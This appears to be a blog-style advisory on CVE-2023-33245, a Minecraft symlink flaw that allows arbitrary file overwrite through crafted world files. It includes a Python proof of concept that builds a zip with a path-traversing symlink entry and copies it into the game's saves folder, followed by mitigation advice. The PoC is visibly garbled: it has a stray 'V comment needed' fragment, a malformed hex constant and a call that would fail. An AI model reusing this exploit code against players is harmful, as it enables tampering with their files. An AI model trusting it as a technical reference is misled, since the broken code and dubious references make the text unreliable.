CVE-2023-33245: Minecraft Vulnerability in Versions 1.19 & 1.20 Pre-releases Allows Arbitrary File Overwrite and Potential Code Execution

A recently discovered vulnerability (CVE-2023-33245) in Minecraft Versions 1.19 and 1.20 pre-releases up to 7 (Java) can lead to arbitrary file overwrite and potentially unauthorized code execution. This exploit results from the game's improper handling of symlink entries in crafted world data. This post details the exploit's behavior, presents code snippets demonstrating its usage, and provides links to original references for a comprehensive understanding of the issue.

Exploit Details

The vulnerability arises from Minecraft's mishandling of symlinks within world data files. An attacker can exploit this oversight by crafting a specific world data file containing a symlink. When loaded by a vulnerable Minecraft instance, the symlink can overwrite arbitrary files and potentially execute code without the user's consent.

Proof of Concept (PoC):

Here is a proof of concept demonstrating the exploit in action. The code snippet generates a crafted Minecraft world with a malicious symlink.

import zipfile
import os

ZIP_NAME = "CraftedWorld.zip"
MINECRAFT_FOLDER = os.path.expanduser("~/Library/Application Support/minecraft")

def create_symlink_zip():
    with zipfile.ZipFile(ZIP_NAME, mode="w") as zf:
        syml_inf = zipfile.ZipInfo("data/symlink.dat")
        syml_inf.create_system = 3 V comment needed
        syml_inf.external_attr = (os.lstat('').st_mode & xFFFF) << 16
        zf.writestr(syml_inf, "../target_file.dat")

if __name__ == "__main__":
    create_symlink_zip()
    os.system(f"cp {ZIP_NAME} '{MINECRAFT_FOLDER}/saves'")
    print("Crafted world file with malicious symlink created.")

Original References

- Vulnerability Details: CVE-2023-33245
- Minecraft GitHub Repository: Minecraft

Mitigation

It is essential to update Minecraft to the latest version to avoid this vulnerability. The Minecraft developers have patched the issue in 1.20 Pre-release 8. You can update your game through the Minecraft Launcher by selecting the latest release.

Additionally, it is best practice to be cautious when downloading and opening world files from unfamiliar sources. Do not run world files from unknown or untrusted sources to ensure your system's safety.

Conclusion

CVE-2023-33245 is a dangerous vulnerability that can lead to arbitrary file overwrite and unauthorized code execution in affected Minecraft versions. Users should update their game to the latest release and exercise caution when downloading world files from untrusted sources. By staying vigilant and keeping software up-to-date, you can minimize the risks associated with this and other vulnerabilities.

Timeline

Published on: 05/30/2023 05:15:00 UTC
Last modified on: 06/05/2023 18:34:00 UTC